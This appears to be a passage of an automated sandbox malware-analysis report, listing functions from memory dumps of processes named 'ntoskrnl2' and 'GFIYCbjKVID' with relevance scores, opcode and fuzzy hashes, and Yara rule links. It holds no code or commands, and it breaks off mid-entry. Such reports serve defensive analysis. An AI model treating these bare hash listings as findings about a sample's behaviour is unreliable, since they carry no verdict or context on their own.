                                                                              • Instruction ID: da15baa32441ac79f4ccf3cfdc8b808db5bac881a4515f170c6908b801fe7f0c
                                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                                              • Instruction Fuzzy Hash: D1C08C22D1E80B4AE620336934860ACA1009BC43D0FD00232D90C800C1AE0F20C5059E
                                                                              Function 00007FF8492F510B Relevance: .0, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c88c17d12854f284fda6a5cc983a83dd3cedc27f27fa79b5787e8377806c5839
                                                                              • Instruction ID: e11289a826083ca73f286f2c373cc8a6d400c9de8003fa413b9a9b8a7677484e
                                                                              • Opcode Fuzzy Hash: c88c17d12854f284fda6a5cc983a83dd3cedc27f27fa79b5787e8377806c5839
                                                                              • Instruction Fuzzy Hash: 50D0C924A0D9F7CDF2387E058021A3B21948F40381F60843DC0BF498CDCE5CB501B70A
                                                                              Function 00007FF8492F00FB Relevance: .0, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2239868166.00007FF8492F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff8492f0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eada250a659c5ff19b22344b2353f89ecd54845331f00fc8fe61fc86f14b50b2
                                                                              • Instruction ID: adebe6f2b22f25e5784a25df34bafef50988cb5cd2eb08760d343be1ae54aec9
                                                                              • Opcode Fuzzy Hash: eada250a659c5ff19b22344b2353f89ecd54845331f00fc8fe61fc86f14b50b2
                                                                              • Instruction Fuzzy Hash: 98D09210A8C5EBCEF178BF01812123A55958F06B81E60003AC2AF518CDC92979417612
                                                                              Function 00007FF848F20728 Relevance: .0, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000025.00000002.2182313984.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_37_2_7ff848f20000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction ID: 1b9d21fc4baaaa9c316c4001c1f62b1f8948b386bee9db51621e34394594a6df
                                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction Fuzzy Hash: 61B01210C6EC0E04D71433B5288706470005B84280FC00370E808800C2E94F20D4029A

                                                                              Executed Functions

                                                                              Function 00007FF848F417A2 Relevance: .4, Instructions: 412COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4080b96c5ca9bd518ef950144c9b73f15aa261f321467953fd70c4f02101f27b
                                                                              • Instruction ID: e57fff6257043118dd47e082475f9a0098ce3193c4aee75301d21db1563272c0
                                                                              • Opcode Fuzzy Hash: 4080b96c5ca9bd518ef950144c9b73f15aa261f321467953fd70c4f02101f27b
                                                                              • Instruction Fuzzy Hash: 11E10732D0E6D55FE342A72CA8651EA7FA0FF52654F1801BBC0889B1E3DF1958898359
                                                                              Function 00007FF848F40A19 Relevance: .3, Instructions: 281COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d769b5a60052839f5236298f0aa5bcd3c7630491ad67491d8639e4ff53f46c66
                                                                              • Instruction ID: 76a6f0cbe4d6aed30c25963690eb3d4bedff2b442f35a705df8c97353d656920
                                                                              • Opcode Fuzzy Hash: d769b5a60052839f5236298f0aa5bcd3c7630491ad67491d8639e4ff53f46c66
                                                                              • Instruction Fuzzy Hash: 51713625A1CA4A4EF399773C48552B976C2EBD6B91F24023ED8CFC32C3DE2C68074249
                                                                              Function 00007FF848F4083D Relevance: .2, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 20fdd9b3ca5c9a9b48330c3dbb21fd403c2ba77629b65acd8361a6568fa8e463
                                                                              • Instruction ID: 4bac7f3975580f59f986919db80a4179fb385c94ded9217b30253c2cde49b632
                                                                              • Opcode Fuzzy Hash: 20fdd9b3ca5c9a9b48330c3dbb21fd403c2ba77629b65acd8361a6568fa8e463
                                                                              • Instruction Fuzzy Hash: 7C513332E1CA588FE794FB3C84492AA7BE0FF98745F05017BE48AD7293DF2498418741
                                                                              Function 00007FF848F41C45 Relevance: .1, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8fe04709b4206dd8215ec2867101a81b3ab70e7d72677375b2e1901e998bc66f
                                                                              • Instruction ID: a8d18cbe66da486e77692d0bc073f307f0812bc5df931d1ed7d9b3486c9f65ae
                                                                              • Opcode Fuzzy Hash: 8fe04709b4206dd8215ec2867101a81b3ab70e7d72677375b2e1901e998bc66f
                                                                              • Instruction Fuzzy Hash: AE41CD71A09A898FE388DF18D8593F97FE0EB29341F50017EC009D73A5DFBA14858785
                                                                              Function 00007FF848F4155D Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 423c42509f1cdd69ddf3f7c3e8d0fd131bb720daf1fbc37edd3418db79955610
                                                                              • Instruction ID: 3ad95a89abeec0b03ad1205ee4e3c7e6f48af20b9e86a4f4e8b46ae6e86debad
                                                                              • Opcode Fuzzy Hash: 423c42509f1cdd69ddf3f7c3e8d0fd131bb720daf1fbc37edd3418db79955610
                                                                              • Instruction Fuzzy Hash: 2B31B131A0D6999FE702FBB898151E9BBB0EF623A1F1841B7C044D71C3EB385589C795
                                                                              Function 00007FF848F412E8 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fd401564935cf16b7163a0edc05421d17ef5eb5ce0b9d5a9de06e162395ff2e1
                                                                              • Instruction ID: a7a909c821316818039cd34b9efc9f0a10618eeb7e70718a5b67a38266509199
                                                                              • Opcode Fuzzy Hash: fd401564935cf16b7163a0edc05421d17ef5eb5ce0b9d5a9de06e162395ff2e1
                                                                              • Instruction Fuzzy Hash: 43210A30B1C9590FE788F76C545D7B936C2DB98B61F4404BAE40DC32D7DD18EC814289
                                                                              Function 00007FF848F40CB9 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cb2286fc6239f4635ef1a11a5787205506a80d9f8440229fccd4186629ea883f
                                                                              • Instruction ID: 93f0310e39cb200a7f0d621d988b035698779f54fba419282048adb16039f8bd
                                                                              • Opcode Fuzzy Hash: cb2286fc6239f4635ef1a11a5787205506a80d9f8440229fccd4186629ea883f
                                                                              • Instruction Fuzzy Hash: D6219571A0C3560AE3B9762C6C112757BE1DFE5680F18017BD88AD22C3EE0EA80943D8
                                                                              Function 00007FF848F40868 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9c4592b067648bf8433678898ff3f8bf5e01c901df16014a08e224deffccf936
                                                                              • Instruction ID: e28f1c91412b095b7cff8c87a9ec21585d83f8af043f430ec1689369001d4727
                                                                              • Opcode Fuzzy Hash: 9c4592b067648bf8433678898ff3f8bf5e01c901df16014a08e224deffccf936
                                                                              • Instruction Fuzzy Hash: 9611273295C7584FD7A0BB3848094EB7FE0FB99615F10063FE88AD3282DB3094458786
                                                                              Function 00007FF848F41588 Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47e7bc57def5f02b20b49e3f47109b50ab983d8b4b41dc7ee3d7b51f9623b44f
                                                                              • Instruction ID: 6142fea02a621b6c8d0ac2205c5b03674f814872ef83255f929cc6647269654f
                                                                              • Opcode Fuzzy Hash: 47e7bc57def5f02b20b49e3f47109b50ab983d8b4b41dc7ee3d7b51f9623b44f
                                                                              • Instruction Fuzzy Hash: F6119A31A0D6998FEB02FB78C8510D8BFB0EF12351F1841B7C084DB192E638A6498781
                                                                              Function 00007FF848F41E1D Relevance: .1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c7c5250fa7e377c574da1b704272f63819615896f92a1f7141e97426f2ca7f5
                                                                              • Instruction ID: 4bda6dafa8b6b9425d09222b86ba0418abe0de14fd59ae22d5962619f560d43a
                                                                              • Opcode Fuzzy Hash: 7c7c5250fa7e377c574da1b704272f63819615896f92a1f7141e97426f2ca7f5
                                                                              • Instruction Fuzzy Hash: 0E01213088E6E25FD36A57709C315A27FA0DF97A50B0901FBD085CB5E3C94D28C2C3A1
                                                                              Function 00007FF848F41590 Relevance: .0, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae1f1cda32df40df3dc8ee7e809fdade32cd3404ef51c0d01cc72354c4b33176
                                                                              • Instruction ID: 228f4803208601ab2335ba239e5a0084b80704259a5848dca569600e3934a43c
                                                                              • Opcode Fuzzy Hash: ae1f1cda32df40df3dc8ee7e809fdade32cd3404ef51c0d01cc72354c4b33176
                                                                              • Instruction Fuzzy Hash: C1115B31A0D6998FE702EB78C9551D9BFB0EF12351F1841E7C084DB192EA38AA898795
                                                                              Function 00007FF848F41598 Relevance: .0, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bbe238bc64a77522ec22a324505af246892058f9d4f5d404cbfa73fe138db69b
                                                                              • Instruction ID: d174d80422bc6c57fe8b55443fce0f10c38066a3ad382b22de2e7f9fa420ae7e
                                                                              • Opcode Fuzzy Hash: bbe238bc64a77522ec22a324505af246892058f9d4f5d404cbfa73fe138db69b
                                                                              • Instruction Fuzzy Hash: CD018C3190D6898FE702EB74C9541DDBFB0EF12350F1842E7C044DB1D2EA38AA88C785
                                                                              Function 00007FF848F415A0 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c52c5ed657ee54271d8fb9be7b8e8fc7d1ffcc2832b31e63349aa220f8629a68
                                                                              • Instruction ID: 37a19fa957fa88e48d8757db28ecbac1c177822f6c96e0dc6fcb8c94e37e309d
                                                                              • Opcode Fuzzy Hash: c52c5ed657ee54271d8fb9be7b8e8fc7d1ffcc2832b31e63349aa220f8629a68
                                                                              • Instruction Fuzzy Hash: 1F015A3090D2898FE702EB64895419DBFB0EF16340F1842E7C045DB192EA389A84C744
                                                                              Function 00007FF848F546FB Relevance: .0, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f50000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                                              • Instruction ID: e5ff749832f8fb77eafdec396720e3f7ae423915988c18ba95a8851dc37c0b5a
                                                                              • Opcode Fuzzy Hash: 55a103812637d333051b723dab04ec49f05019d8547d727c9092f8c9ad90b79e
                                                                              • Instruction Fuzzy Hash: 8CF05E70E0C5274FE758BB1CA8406F97290EF65750F1541B5D85EC32C7EF38E8428689
                                                                              Function 00007FF848F41E50 Relevance: .0, Instructions: 27COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 96565fc0f0d9c527e38b4522e3765084d709a93d3ddf374568ecdd2cd2546fc8
                                                                              • Instruction ID: c2cca6adbb0c36ae81c94d84864e05f1867e6bf583c72b23f3b783f73f25a167
                                                                              • Opcode Fuzzy Hash: 96565fc0f0d9c527e38b4522e3765084d709a93d3ddf374568ecdd2cd2546fc8
                                                                              • Instruction Fuzzy Hash: 1EE07D30D4C8291BD76CB63478611F57390EB45610F0505BEC01AC36C6DD5C5CC183C1
                                                                              Function 00007FF848F55108 Relevance: .0, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f50000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                                              • Instruction ID: 3b0176d0377caffb4c0d4fe9cc1564661e52fd97e2c8fe1126a32e6fcedcf79c
                                                                              • Opcode Fuzzy Hash: 32ba93301b27e784eb2fb684687259cc95d823aec9c9ea40065ac09acac1121f
                                                                              • Instruction Fuzzy Hash: F2D05E30B6090D4B8B0CB62D8458431B3D1E7AA2167D46278940BC2285ED25ECC68B84
                                                                              Function 00007FF848F44D19 Relevance: .0, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction ID: e2de89b7dc663fb167da6925a40e075919ea9f436fd0545db7e4e49c8be6d3d8
                                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                                              • Instruction Fuzzy Hash: 12E01230E0C12A4BFB54B788C850BB96290EF68740F1041BAD94EF33C2DE38AE45DB59
                                                                              Function 00007FF848F53F7E Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f50000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 09b3d263cac86ead69afb5d33ab5cc7d6ea8f804642d049049127d1e14b2bf85
                                                                              • Instruction ID: 557247f192c74db6b94f4a66498ad9c45d9c21ac7384896dcb4a3d7e1bb0627a
                                                                              • Opcode Fuzzy Hash: 09b3d263cac86ead69afb5d33ab5cc7d6ea8f804642d049049127d1e14b2bf85
                                                                              • Instruction Fuzzy Hash: F2E0B670D0961E9FE754EB58C8196BEB6B2FB54644F8001398009EB696DF3818018748
                                                                              Function 00007FF848F42759 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38c294af2fbeaaa76d369183498b24be2d754abff6ad9db2c6b5e29de6d4f36e
                                                                              • Instruction ID: 3ce87cafb08a5662636bb9494e2ad9a9772cc478315b733d558e88b13e0b6005
                                                                              • Opcode Fuzzy Hash: 38c294af2fbeaaa76d369183498b24be2d754abff6ad9db2c6b5e29de6d4f36e
                                                                              • Instruction Fuzzy Hash: 1BD09E31D1C5558EDB55DA188498768BB91FB58744F1542B5C80CA3286C7359E81DB44
                                                                              Function 00007FF848F41765 Relevance: .0, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction ID: 25a201621a88507bd1d9450efb855f7defd72bd43c4a6b1ff9bf2f8632a7cb6e
                                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                                              • Instruction Fuzzy Hash: E2C08C34529808CFC908FB7DCC8890833B0FB1A304BC200A1E00DC72B2D219DCD2C781
                                                                              Function 00007FF848F40705 Relevance: .0, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                                              • Instruction ID: 13d8e12c8c43e535dc27aed35d1c8f5c675aaa1d7fe9e1b75f70b26a61f3bae1
                                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                                              • Instruction Fuzzy Hash: 1DC08C20D9E81B09E620336918860ACA1009BF4ED0FE00133C90CA00C3AE0D21C505AB
                                                                              Function 00007FF848F40728 Relevance: .0, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f40000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction ID: f1edc2db4faf52e30014c1ec62aa36b325807caa3cdad2805f4e5d3d82a1dfc8
                                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                                              • Instruction Fuzzy Hash: 1EB01210CAE80E05D71433B50C8706470005BD45C0FC00271D408D00C3E94D11D40266
                                                                              Function 00007FF848F55DBF Relevance: .0, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000026.00000002.2904064238.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_38_2_7ff848f50000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                                              • Instruction ID: 1a01abccc35e72a5524170e707a165538635c924826728b612341595fdaf3341
                                                                              • Opcode Fuzzy Hash: 99c0cbb2557376d49d0aacbb3acc4d5c1c94a18e875f18da931712d202945757
                                                                              • Instruction Fuzzy Hash: C7B09230D0C15A8FE740AA8080007AA21025B58350F208432982E532C28AA86801929A

                                                                              Executed Functions

                                                                              Function 00007FF848F30BAC Relevance: 1.8, Instructions: 1767COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aa320b258d2114c60a86e712d771ccdf00e63fd0b4a0743cd1c4e50a2d7a3e70
                                                                              • Instruction ID: 499d052d7cee85ea73251f58c1a34e7e5f9379c0f3e38fded3d37ba860cd94bf
                                                                              • Opcode Fuzzy Hash: aa320b258d2114c60a86e712d771ccdf00e63fd0b4a0743cd1c4e50a2d7a3e70
                                                                              • Instruction Fuzzy Hash: 1EC26E31E1C91A9FEB98FB2894516B973E2FB98740F1441B9D40DD32C7DE38A9828785
                                                                              Function 00007FF848F30D8F Relevance: 1.3, Instructions: 1259COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db9ba9881d540ce590ae5ab406e04cd8003de864a87a0bc0d26fd1354deab4f8
                                                                              • Instruction ID: f043804238b649b7448527625b57fdb0992713e14ccf6cc17b1e0b287fa8af03
                                                                              • Opcode Fuzzy Hash: db9ba9881d540ce590ae5ab406e04cd8003de864a87a0bc0d26fd1354deab4f8
                                                                              • Instruction Fuzzy Hash: D1926D31E1C95A8FEA98FB2894557B973E2FF98744F1441BAD40DC32C3DF28A8868745
                                                                              Function 00007FF848F33921 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f30000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M
                                                                              • API String ID: 0-3664761504
                                                                              • Opcode ID: 9a40e64af50ccf03d77dc3dc00cc919c1f12edfde00703988c9034e697304cae
                                                                              • Instruction ID: 98ed8b22f626086493b7e13643c8b7cdeacf00b12b850ed69458ac0f46f89404
                                                                              • Opcode Fuzzy Hash: 9a40e64af50ccf03d77dc3dc00cc919c1f12edfde00703988c9034e697304cae
                                                                              • Instruction Fuzzy Hash: 4711C131D0E7C94FD706EB3858684A87FB0EF56240F4901EFC085CB0E3EA29598AC701
                                                                              Function 00007FF848F217A2 Relevance: .5, Instructions: 459COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.2430062197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 51671f5a1e8a90622270a5341c7d9623eab0dd84c3c908bd50ecbee773285029
                                                                              • Instruction ID: 26b1f5af721cb198c0242bba15fd997dd783d09d192ada499f6102d3ab9ef840
